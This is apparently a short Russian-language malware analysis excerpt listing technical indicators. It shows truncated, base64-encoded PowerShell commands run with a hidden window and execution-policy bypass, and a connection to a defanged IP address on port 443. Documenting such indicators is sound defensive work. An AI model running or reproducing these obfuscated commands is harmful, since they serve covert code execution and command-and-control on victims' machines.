Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ep bypass -nop -enc JABhACAAPQAgACIALQB3ACAAaABpAGQAZABlAG4AIAAtAHMAdABhACAALQBuAG8AcAAgAC0AbgBvAGUAeABpAHQAIAAtAGUAcAAgAGIAeQBwAGEAcwBzACAALQBlAG4AYwAgAFcAdwBCAFQAQQBIAGsAQQBjAHcAQg...
- '18#.#80.198.170':443
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ep bypass -nop -enc JABhACAAPQAgACIALQB3ACAAaABpAGQAZABlAG4AIAAtAHMAdABhACAALQBuAG8AcAAgAC0AbgBvAGUAeABpAHQAIAAtAGUAcAAgAGIAeQBwAGEAcwBzACAALQBlAG4AYwAgAFcAdwBCAFQAQQBIAGsAQQBjAHcAQg...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -sta -nop -noexit -ep bypass -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkA...' (со скрытым окном)